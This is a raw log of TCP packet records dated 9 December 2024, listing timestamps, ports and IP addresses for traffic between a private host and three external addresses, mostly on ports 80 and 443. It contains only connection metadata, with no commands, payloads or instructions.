Dec 9, 2024 08:08:55.963748932 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.963767052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.963814020 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.963829041 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.964811087 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.964829922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.964855909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.964874983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.965821981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.965835094 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.965845108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.965862989 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.965873957 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.965888023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.966902018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.966912985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.966954947 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.967901945 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.967915058 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.967951059 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.968950987 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.968962908 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.968995094 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.969023943 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.969973087 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.969999075 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.970010042 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.970019102 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.970030069 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.970052958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.972043037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.972054005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.972063065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.972084045 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.972096920 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.972115993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.975543022 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.975569010 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.975605965 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.975615978 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.975651026 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.975688934 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.041448116 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.041492939 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.041500092 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.041512012 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.041553974 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.041563034 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.041580915 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.041600943 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.042273045 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.042318106 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.042759895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.042771101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.042813063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.042813063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.043709040 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.043720961 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.043761015 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.044631004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.044642925 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.044687033 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.045600891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.045613050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.045643091 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.045654058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.046591043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.046602011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.046638012 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.047528982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.047540903 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.047576904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.048448086 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.048460007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.048494101 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.049375057 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.049386024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.049422979 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.050286055 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.050298929 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.050334930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.054611921 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:56.094563007 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:56.119803905 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.119853973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.120060921 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.120120049 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.120510101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.120553017 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.120970011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.121012926 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.121462107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.121474981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.121509075 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.122865915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.122910976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.123760939 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.123807907 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.124278069 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.124290943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.124325991 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.125169992 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.125183105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.125216961 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.127137899 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.127150059 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.127178907 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.127188921 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.128195047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.128206968 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.128247976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.129221916 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.129234076 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.129271030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.130233049 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.130238056 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.130244970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.130280018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.130294085 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.131246090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.131263018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.131294966 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.131305933 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.132303953 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.132344007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.133349895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.133362055 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.133400917 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.134424925 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.134437084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.134473085 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.135425091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.135467052 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.136450052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.136465073 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.136495113 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.136509895 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.137481928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.137494087 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.137528896 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.137540102 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.138521910 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.138534069 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.138544083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.138569117 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.138592958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.139528036 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.139547110 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.139571905 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.139584064 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.140564919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.140575886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.140611887 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.142658949 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.142671108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.142703056 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.142714024 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.143678904 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.143691063 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.143701077 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.143718004 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.143733978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.144675016 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.144686937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.144712925 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.144735098 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.145760059 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.145772934 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.145802021 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.145817995 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.146784067 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.146795988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.146833897 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.147814035 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.147855997 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.147902012 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.147922039 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.147958994 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.147972107 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.147998095 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.148025990 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.148857117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.148869038 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.148905039 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.149892092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.149904966 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.149935007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.150908947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.150921106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.150953054 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.150964975 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.151949883 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.151962996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.151973009 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.151995897 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.152014971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.152981997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.153028965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.154067993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.154110909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.155054092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.155066013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.155102968 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.156141996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.156152964 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.156188965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.157104015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.157125950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.157138109 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.157145023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.157157898 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.157180071 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.158179998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.158191919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.158227921 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.158243895 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.159209967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.159223080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.159259081 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.161318064 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.161331892 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.161366940 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.161379099 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.162281036 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.162292957 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.162307024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.162327051 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.162362099 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.163290977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.163333893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.163352013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.163388014 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.164355993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.164367914 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.164402962 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.165383101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.165422916 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.166433096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.166481018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.167453051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.167469025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.167501926 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.167514086 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.172696114 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.172714949 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.172769070 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.172779083 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.172817945 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.193994045 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.194015026 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.194061995 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.194076061 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.194106102 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.194128036 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.233347893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.233412981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.233592033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.233628988 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.234013081 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.234064102 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.234467030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.234533072 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.234745979 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.234795094 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.235234022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.235275984 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.235728025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.235744953 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.235775948 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.235786915 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.236747980 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.236795902 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.237207890 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.237258911 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.237703085 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.237714052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.237749100 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.237766981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.238631964 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.238642931 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.238684893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.239564896 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.239576101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.239614010 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.240506887 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.240551949 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.241527081 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.241539001 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.241549015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.241571903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.241590977 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.242429018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.242477894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.246953964 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.246974945 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.247020006 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.247031927 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.247045040 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.247071028 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.311995983 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.312043905 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.312220097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.312263012 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.312717915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.312764883 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.313158989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.313201904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.313658953 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.313672066 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.313711882 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.315525055 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.315536022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.315579891 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.316502094 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.316513062 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.316550016 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.318358898 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.318371058 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.318401098 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.318413019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.319303036 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.319318056 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.319355011 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.319365978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.320332050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.320343971 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.320379019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.320389032 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.322381020 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.322396994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.322433949 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.323436022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.323446035 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.323453903 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.323477983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.323494911 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.324470997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.324518919 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.325525045 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.325572014 CET	49880	80	192.168.2.4	185.215.113.206
